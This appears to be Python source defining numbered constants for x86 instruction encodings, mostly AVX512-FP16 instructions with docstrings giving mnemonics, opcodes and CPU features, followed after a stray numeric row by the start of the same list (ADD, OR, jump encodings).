``VFNMADD213SH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.66.MAP6.W0 AD /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMADD231SH_XMM_K1Z_XMM_XMMM16_ER: int = 4475
"""
``VFNMADD231SH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.66.MAP6.W0 BD /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUB132PH_XMM_K1Z_XMM_XMMM128B16: int = 4476
"""
``VFMSUB132PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 9A /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUB132PH_YMM_K1Z_YMM_YMMM256B16: int = 4477
"""
``VFMSUB132PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 9A /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUB132PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4478
"""
``VFMSUB132PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 9A /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUB213PH_XMM_K1Z_XMM_XMMM128B16: int = 4479
"""
``VFMSUB213PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 AA /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUB213PH_YMM_K1Z_YMM_YMMM256B16: int = 4480
"""
``VFMSUB213PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 AA /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUB213PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4481
"""
``VFMSUB213PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 AA /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUB231PH_XMM_K1Z_XMM_XMMM128B16: int = 4482
"""
``VFMSUB231PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 BA /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUB231PH_YMM_K1Z_YMM_YMMM256B16: int = 4483
"""
``VFMSUB231PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 BA /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUB231PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4484
"""
``VFMSUB231PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 BA /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMSUB132PH_XMM_K1Z_XMM_XMMM128B16: int = 4485
"""
``VFNMSUB132PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 9E /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMSUB132PH_YMM_K1Z_YMM_YMMM256B16: int = 4486
"""
``VFNMSUB132PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 9E /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMSUB132PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4487
"""
``VFNMSUB132PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 9E /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMSUB213PH_XMM_K1Z_XMM_XMMM128B16: int = 4488
"""
``VFNMSUB213PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 AE /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMSUB213PH_YMM_K1Z_YMM_YMMM256B16: int = 4489
"""
``VFNMSUB213PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 AE /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMSUB213PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4490
"""
``VFNMSUB213PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 AE /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMSUB231PH_XMM_K1Z_XMM_XMMM128B16: int = 4491
"""
``VFNMSUB231PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 BE /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMSUB231PH_YMM_K1Z_YMM_YMMM256B16: int = 4492
"""
``VFNMSUB231PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 BE /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMSUB231PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4493
"""
``VFNMSUB231PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 BE /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUB132SH_XMM_K1Z_XMM_XMMM16_ER: int = 4494
"""
``VFMSUB132SH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.66.MAP6.W0 9B /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUB213SH_XMM_K1Z_XMM_XMMM16_ER: int = 4495
"""
``VFMSUB213SH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.66.MAP6.W0 AB /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUB231SH_XMM_K1Z_XMM_XMMM16_ER: int = 4496
"""
``VFMSUB231SH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.66.MAP6.W0 BB /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMSUB132SH_XMM_K1Z_XMM_XMMM16_ER: int = 4497
"""
``VFNMSUB132SH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.66.MAP6.W0 9F /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMSUB213SH_XMM_K1Z_XMM_XMMM16_ER: int = 4498
"""
``VFNMSUB213SH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.66.MAP6.W0 AF /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMSUB231SH_XMM_K1Z_XMM_XMMM16_ER: int = 4499
"""
``VFNMSUB231SH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.66.MAP6.W0 BF /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFPCLASSPH_KR_K1_XMMM128B16_IMM8: int = 4500
"""
``VFPCLASSPH k1 {k2}, xmm2/m128/m16bcst, imm8``
``EVEX.128.0F3A.W0 66 /r ib``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFPCLASSPH_KR_K1_YMMM256B16_IMM8: int = 4501
"""
``VFPCLASSPH k1 {k2}, ymm2/m256/m16bcst, imm8``
``EVEX.256.0F3A.W0 66 /r ib``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFPCLASSPH_KR_K1_ZMMM512B16_IMM8: int = 4502
"""
``VFPCLASSPH k1 {k2}, zmm2/m512/m16bcst, imm8``
``EVEX.512.0F3A.W0 66 /r ib``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFPCLASSSH_KR_K1_XMMM16_IMM8: int = 4503
"""
``VFPCLASSSH k1 {k2}, xmm2/m16, imm8``
``EVEX.LIG.0F3A.W0 67 /r ib``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VGETEXPPH_XMM_K1Z_XMMM128B16: int = 4504
"""
``VGETEXPPH xmm1 {k1}{z}, xmm2/m128/m16bcst``
``EVEX.128.66.MAP6.W0 42 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VGETEXPPH_YMM_K1Z_YMMM256B16: int = 4505
"""
``VGETEXPPH ymm1 {k1}{z}, ymm2/m256/m16bcst``
``EVEX.256.66.MAP6.W0 42 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VGETEXPPH_ZMM_K1Z_ZMMM512B16_SAE: int = 4506
"""
``VGETEXPPH zmm1 {k1}{z}, zmm2/m512/m16bcst{sae}``
``EVEX.512.66.MAP6.W0 42 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VGETEXPSH_XMM_K1Z_XMM_XMMM16_SAE: int = 4507
"""
``VGETEXPSH xmm1 {k1}{z}, xmm2, xmm3/m16{sae}``
``EVEX.LIG.66.MAP6.W0 43 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VGETMANTPH_XMM_K1Z_XMMM128B16_IMM8: int = 4508
"""
``VGETMANTPH xmm1 {k1}{z}, xmm2/m128/m16bcst, imm8``
``EVEX.128.0F3A.W0 26 /r ib``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VGETMANTPH_YMM_K1Z_YMMM256B16_IMM8: int = 4509
"""
``VGETMANTPH ymm1 {k1}{z}, ymm2/m256/m16bcst, imm8``
``EVEX.256.0F3A.W0 26 /r ib``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VGETMANTPH_ZMM_K1Z_ZMMM512B16_IMM8_SAE: int = 4510
"""
``VGETMANTPH zmm1 {k1}{z}, zmm2/m512/m16bcst{sae}, imm8``
``EVEX.512.0F3A.W0 26 /r ib``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VGETMANTSH_XMM_K1Z_XMM_XMMM16_IMM8_SAE: int = 4511
"""
``VGETMANTSH xmm1 {k1}{z}, xmm2, xmm3/m16{sae}, imm8``
``EVEX.LIG.0F3A.W0 27 /r ib``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMAXPH_XMM_K1Z_XMM_XMMM128B16: int = 4512
"""
``VMAXPH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.MAP5.W0 5F /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMAXPH_YMM_K1Z_YMM_YMMM256B16: int = 4513
"""
``VMAXPH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.MAP5.W0 5F /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMAXPH_ZMM_K1Z_ZMM_ZMMM512B16_SAE: int = 4514
"""
``VMAXPH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{sae}``
``EVEX.512.MAP5.W0 5F /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMAXSH_XMM_K1Z_XMM_XMMM16_SAE: int = 4515
"""
``VMAXSH xmm1 {k1}{z}, xmm2, xmm3/m16{sae}``
``EVEX.LIG.F3.MAP5.W0 5F /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMINPH_XMM_K1Z_XMM_XMMM128B16: int = 4516
"""
``VMINPH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.MAP5.W0 5D /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMINPH_YMM_K1Z_YMM_YMMM256B16: int = 4517
"""
``VMINPH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.MAP5.W0 5D /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMINPH_ZMM_K1Z_ZMM_ZMMM512B16_SAE: int = 4518
"""
``VMINPH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{sae}``
``EVEX.512.MAP5.W0 5D /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMINSH_XMM_K1Z_XMM_XMMM16_SAE: int = 4519
"""
``VMINSH xmm1 {k1}{z}, xmm2, xmm3/m16{sae}``
``EVEX.LIG.F3.MAP5.W0 5D /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMOVSH_XMM_K1Z_M16: int = 4520
"""
``VMOVSH xmm1 {k1}{z}, m16``
``EVEX.LIG.F3.MAP5.W0 10 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMOVSH_M16_K1_XMM: int = 4521
"""
``VMOVSH m16 {k1}, xmm1``
``EVEX.LIG.F3.MAP5.W0 11 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMOVSH_XMM_K1Z_XMM_XMM: int = 4522
"""
``VMOVSH xmm1 {k1}{z}, xmm2, xmm3``
``EVEX.LIG.F3.MAP5.W0 10 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMOVSH_XMM_K1Z_XMM_XMM_MAP5_11: int = 4523
"""
``VMOVSH xmm1 {k1}{z}, xmm2, xmm3``
``EVEX.LIG.F3.MAP5.W0 11 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMOVW_XMM_R32M16: int = 4524
"""
``VMOVW xmm1, r32/m16``
``EVEX.128.66.MAP5.W0 6E /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMOVW_XMM_R64M16: int = 4525
"""
``VMOVW xmm1, r64/m16``
``EVEX.128.66.MAP5.W1 6E /r``
``AVX512-FP16``
``64-bit``
"""
EVEX_VMOVW_R32M16_XMM: int = 4526
"""
``VMOVW r32/m16, xmm1``
``EVEX.128.66.MAP5.W0 7E /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMOVW_R64M16_XMM: int = 4527
"""
``VMOVW r64/m16, xmm1``
``EVEX.128.66.MAP5.W1 7E /r``
``AVX512-FP16``
``64-bit``
"""
EVEX_VMULPH_XMM_K1Z_XMM_XMMM128B16: int = 4528
"""
``VMULPH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.MAP5.W0 59 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMULPH_YMM_K1Z_YMM_YMMM256B16: int = 4529
"""
``VMULPH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.MAP5.W0 59 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMULPH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4530
"""
``VMULPH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.MAP5.W0 59 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMULSH_XMM_K1Z_XMM_XMMM16_ER: int = 4531
"""
``VMULSH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.F3.MAP5.W0 59 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VRCPPH_XMM_K1Z_XMMM128B16: int = 4532
"""
``VRCPPH xmm1 {k1}{z}, xmm2/m128/m16bcst``
``EVEX.128.66.MAP6.W0 4C /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VRCPPH_YMM_K1Z_YMMM256B16: int = 4533
"""
``VRCPPH ymm1 {k1}{z}, ymm2/m256/m16bcst``
``EVEX.256.66.MAP6.W0 4C /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VRCPPH_ZMM_K1Z_ZMMM512B16: int = 4534
"""
``VRCPPH zmm1 {k1}{z}, zmm2/m512/m16bcst``
``EVEX.512.66.MAP6.W0 4C /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VRCPSH_XMM_K1Z_XMM_XMMM16: int = 4535
"""
``VRCPSH xmm1 {k1}{z}, xmm2, xmm3/m16``
``EVEX.LIG.66.MAP6.W0 4D /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VREDUCEPH_XMM_K1Z_XMMM128B16_IMM8: int = 4536
"""
``VREDUCEPH xmm1 {k1}{z}, xmm2/m128/m16bcst, imm8``
``EVEX.128.0F3A.W0 56 /r ib``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VREDUCEPH_YMM_K1Z_YMMM256B16_IMM8: int = 4537
"""
``VREDUCEPH ymm1 {k1}{z}, ymm2/m256/m16bcst, imm8``
``EVEX.256.0F3A.W0 56 /r ib``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VREDUCEPH_ZMM_K1Z_ZMMM512B16_IMM8_SAE: int = 4538
"""
``VREDUCEPH zmm1 {k1}{z}, zmm2/m512/m16bcst{sae}, imm8``
``EVEX.512.0F3A.W0 56 /r ib``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VREDUCESH_XMM_K1Z_XMM_XMMM16_IMM8_SAE: int = 4539
"""
``VREDUCESH xmm1 {k1}{z}, xmm2, xmm3/m16{sae}, imm8``
``EVEX.LIG.0F3A.W0 57 /r ib``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VRNDSCALEPH_XMM_K1Z_XMMM128B16_IMM8: int = 4540
"""
``VRNDSCALEPH xmm1 {k1}{z}, xmm2/m128/m16bcst, imm8``
``EVEX.128.0F3A.W0 08 /r ib``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VRNDSCALEPH_YMM_K1Z_YMMM256B16_IMM8: int = 4541
"""
``VRNDSCALEPH ymm1 {k1}{z}, ymm2/m256/m16bcst, imm8``
``EVEX.256.0F3A.W0 08 /r ib``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VRNDSCALEPH_ZMM_K1Z_ZMMM512B16_IMM8_SAE: int = 4542
"""
``VRNDSCALEPH zmm1 {k1}{z}, zmm2/m512/m16bcst{sae}, imm8``
``EVEX.512.0F3A.W0 08 /r ib``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VRNDSCALESH_XMM_K1Z_XMM_XMMM16_IMM8_SAE: int = 4543
"""
``VRNDSCALESH xmm1 {k1}{z}, xmm2, xmm3/m16{sae}, imm8``
``EVEX.LIG.0F3A.W0 0A /r ib``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VRSQRTPH_XMM_K1Z_XMMM128B16: int = 4544
"""
``VRSQRTPH xmm1 {k1}{z}, xmm2/m128/m16bcst``
``EVEX.128.66.MAP6.W0 4E /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VRSQRTPH_YMM_K1Z_YMMM256B16: int = 4545
"""
``VRSQRTPH ymm1 {k1}{z}, ymm2/m256/m16bcst``
``EVEX.256.66.MAP6.W0 4E /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VRSQRTPH_ZMM_K1Z_ZMMM512B16: int = 4546
"""
``VRSQRTPH zmm1 {k1}{z}, zmm2/m512/m16bcst``
``EVEX.512.66.MAP6.W0 4E /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VRSQRTSH_XMM_K1Z_XMM_XMMM16: int = 4547
"""
``VRSQRTSH xmm1 {k1}{z}, xmm2, xmm3/m16``
``EVEX.LIG.66.MAP6.W0 4F /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VSCALEFPH_XMM_K1Z_XMM_XMMM128B16: int = 4548
"""
``VSCALEFPH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 2C /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VSCALEFPH_YMM_K1Z_YMM_YMMM256B16: int = 4549
"""
``VSCALEFPH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 2C /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VSCALEFPH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4550
"""
``VSCALEFPH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 2C /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VSCALEFSH_XMM_K1Z_XMM_XMMM16_ER: int = 4551
"""
``VSCALEFSH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.66.MAP6.W0 2D /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VSQRTPH_XMM_K1Z_XMMM128B16: int = 4552
"""
``VSQRTPH xmm1 {k1}{z}, xmm2/m128/m16bcst``
``EVEX.128.MAP5.W0 51 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VSQRTPH_YMM_K1Z_YMMM256B16: int = 4553
"""
``VSQRTPH ymm1 {k1}{z}, ymm2/m256/m16bcst``
``EVEX.256.MAP5.W0 51 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VSQRTPH_ZMM_K1Z_ZMMM512B16_ER: int = 4554
"""
``VSQRTPH zmm1 {k1}{z}, zmm2/m512/m16bcst{er}``
``EVEX.512.MAP5.W0 51 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VSQRTSH_XMM_K1Z_XMM_XMMM16_ER: int = 4555
"""
``VSQRTSH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.F3.MAP5.W0 51 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VSUBPH_XMM_K1Z_XMM_XMMM128B16: int = 4556
"""
``VSUBPH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.MAP5.W0 5C /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VSUBPH_YMM_K1Z_YMM_YMMM256B16: int = 4557
"""
``VSUBPH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.MAP5.W0 5C /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VSUBPH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4558
"""
``VSUBPH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.MAP5.W0 5C /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VSUBSH_XMM_K1Z_XMM_XMMM16_ER: int = 4559
"""
``VSUBSH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.F3.MAP5.W0 5C /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VUCOMISH_XMM_XMMM16_SAE: int = 4560
"""
``VUCOMISH xmm1, xmm2/m16{sae}``
``EVEX.LIG.MAP5.W0 2E /r``
``AVX512-FP16``
``16/32/64-bit``
"""
RDUDBG: int = 4561
"""
``RDUDBG``
``0F 0E``
``UDBG``
``16/32/64-bit``
"""
WRUDBG: int = 4562
"""
``WRUDBG``
``0F 0F``
``UDBG``
``16/32/64-bit``
"""
| 13.336432 | 131 | 0.606806 |
INVALID: int = 0
DECLAREBYTE: int = 1
DECLAREWORD: int = 2
DECLAREDWORD: int = 3
DECLAREQWORD: int = 4
ADD_RM8_R8: int = 5
ADD_RM16_R16: int = 6
ADD_RM32_R32: int = 7
ADD_RM64_R64: int = 8
ADD_R8_RM8: int = 9
ADD_R16_RM16: int = 10
ADD_R32_RM32: int = 11
ADD_R64_RM64: int = 12
ADD_AL_IMM8: int = 13
ADD_AX_IMM16: int = 14
ADD_EAX_IMM32: int = 15
ADD_RAX_IMM32: int = 16
PUSHW_ES: int = 17
PUSHD_ES: int = 18
POPW_ES: int = 19
POPD_ES: int = 20
OR_RM8_R8: int = 21
OR_RM16_R16: int = 22
OR_RM32_R32: int = 23
OR_RM64_R64: int = 24
OR_R8_RM8: int = 25
OR_R16_RM16: int = 26
OR_R32_RM32: int = 27
OR_R64_RM64: int = 28
OR_AL_IMM8: int = 29
OR_AX_IMM16: int = 30
OR_EAX_IMM32: int = 31
OR_RAX_IMM32: int = 32
PUSHW_CS: int = 33
PUSHD_CS: int = 34
POPW_CS: int = 35
ADC_RM8_R8: int = 36
ADC_RM16_R16: int = 37
ADC_RM32_R32: int = 38
ADC_RM64_R64: int = 39
ADC_R8_RM8: int = 40
ADC_R16_RM16: int = 41
ADC_R32_RM32: int = 42
ADC_R64_RM64: int = 43
ADC_AL_IMM8: int = 44
ADC_AX_IMM16: int = 45
ADC_EAX_IMM32: int = 46
ADC_RAX_IMM32: int = 47
PUSHW_SS: int = 48
PUSHD_SS: int = 49
POPW_SS: int = 50
POPD_SS: int = 51
SBB_RM8_R8: int = 52
SBB_RM16_R16: int = 53
SBB_RM32_R32: int = 54
SBB_RM64_R64: int = 55
SBB_R8_RM8: int = 56
SBB_R16_RM16: int = 57
SBB_R32_RM32: int = 58
SBB_R64_RM64: int = 59
SBB_AL_IMM8: int = 60
SBB_AX_IMM16: int = 61
SBB_EAX_IMM32: int = 62
SBB_RAX_IMM32: int = 63
PUSHW_DS: int = 64
PUSHD_DS: int = 65
POPW_DS: int = 66
POPD_DS: int = 67
AND_RM8_R8: int = 68
AND_RM16_R16: int = 69
AND_RM32_R32: int = 70
AND_RM64_R64: int = 71
AND_R8_RM8: int = 72
AND_R16_RM16: int = 73
AND_R32_RM32: int = 74
AND_R64_RM64: int = 75
AND_AL_IMM8: int = 76
AND_AX_IMM16: int = 77
AND_EAX_IMM32: int = 78
AND_RAX_IMM32: int = 79
DAA: int = 80
SUB_RM8_R8: int = 81
SUB_RM16_R16: int = 82
SUB_RM32_R32: int = 83
SUB_RM64_R64: int = 84
SUB_R8_RM8: int = 85
SUB_R16_RM16: int = 86
SUB_R32_RM32: int = 87
SUB_R64_RM64: int = 88
SUB_AL_IMM8: int = 89
SUB_AX_IMM16: int = 90
SUB_EAX_IMM32: int = 91
SUB_RAX_IMM32: int = 92
DAS: int = 93
XOR_RM8_R8: int = 94
XOR_RM16_R16: int = 95
XOR_RM32_R32: int = 96
XOR_RM64_R64: int = 97
XOR_R8_RM8: int = 98
XOR_R16_RM16: int = 99
XOR_R32_RM32: int = 100
XOR_R64_RM64: int = 101
XOR_AL_IMM8: int = 102
XOR_AX_IMM16: int = 103
XOR_EAX_IMM32: int = 104
XOR_RAX_IMM32: int = 105
AAA: int = 106
CMP_RM8_R8: int = 107
CMP_RM16_R16: int = 108
CMP_RM32_R32: int = 109
CMP_RM64_R64: int = 110
CMP_R8_RM8: int = 111
CMP_R16_RM16: int = 112
CMP_R32_RM32: int = 113
CMP_R64_RM64: int = 114
CMP_AL_IMM8: int = 115
CMP_AX_IMM16: int = 116
CMP_EAX_IMM32: int = 117
CMP_RAX_IMM32: int = 118
AAS: int = 119
INC_R16: int = 120
INC_R32: int = 121
DEC_R16: int = 122
DEC_R32: int = 123
PUSH_R16: int = 124
PUSH_R32: int = 125
PUSH_R64: int = 126
POP_R16: int = 127
POP_R32: int = 128
POP_R64: int = 129
PUSHAW: int = 130
PUSHAD: int = 131
POPAW: int = 132
POPAD: int = 133
BOUND_R16_M1616: int = 134
BOUND_R32_M3232: int = 135
ARPL_RM16_R16: int = 136
ARPL_R32M16_R32: int = 137
MOVSXD_R16_RM16: int = 138
MOVSXD_R32_RM32: int = 139
MOVSXD_R64_RM32: int = 140
PUSH_IMM16: int = 141
PUSHD_IMM32: int = 142
PUSHQ_IMM32: int = 143
IMUL_R16_RM16_IMM16: int = 144
IMUL_R32_RM32_IMM32: int = 145
IMUL_R64_RM64_IMM32: int = 146
PUSHW_IMM8: int = 147
PUSHD_IMM8: int = 148
PUSHQ_IMM8: int = 149
IMUL_R16_RM16_IMM8: int = 150
IMUL_R32_RM32_IMM8: int = 151
IMUL_R64_RM64_IMM8: int = 152
INSB_M8_DX: int = 153
INSW_M16_DX: int = 154
INSD_M32_DX: int = 155
OUTSB_DX_M8: int = 156
OUTSW_DX_M16: int = 157
OUTSD_DX_M32: int = 158
JO_REL8_16: int = 159
JO_REL8_32: int = 160
JO_REL8_64: int = 161
JNO_REL8_16: int = 162
JNO_REL8_32: int = 163
JNO_REL8_64: int = 164
JB_REL8_16: int = 165
JB_REL8_32: int = 166
JB_REL8_64: int = 167
JAE_REL8_16: int = 168
JAE_REL8_32: int = 169
JAE_REL8_64: int = 170
JE_REL8_16: int = 171
JE_REL8_32: int = 172
JE_REL8_64: int = 173
JNE_REL8_16: int = 174
JNE_REL8_32: int = 175
JNE_REL8_64: int = 176
JBE_REL8_16: int = 177
JBE_REL8_32: int = 178
JBE_REL8_64: int = 179
JA_REL8_16: int = 180
JA_REL8_32: int = 181
JA_REL8_64: int = 182
JS_REL8_16: int = 183
JS_REL8_32: int = 184
JS_REL8_64: int = 185
JNS_REL8_16: int = 186
JNS_REL8_32: int = 187
JNS_REL8_64: int = 188
JP_REL8_16: int = 189
JP_REL8_32: int = 190
JP_REL8_64: int = 191
JNP_REL8_16: int = 192
JNP_REL8_32: int = 193
JNP_REL8_64: int = 194
JL_REL8_16: int = 195
JL_REL8_32: int = 196
JL_REL8_64: int = 197
JGE_REL8_16: int = 198
JGE_REL8_32: int = 199
JGE_REL8_64: int = 200
JLE_REL8_16: int = 201
JLE_REL8_32: int = 202
JLE_REL8_64: int = 203
JG_REL8_16: int = 204
JG_REL8_32: int = 205
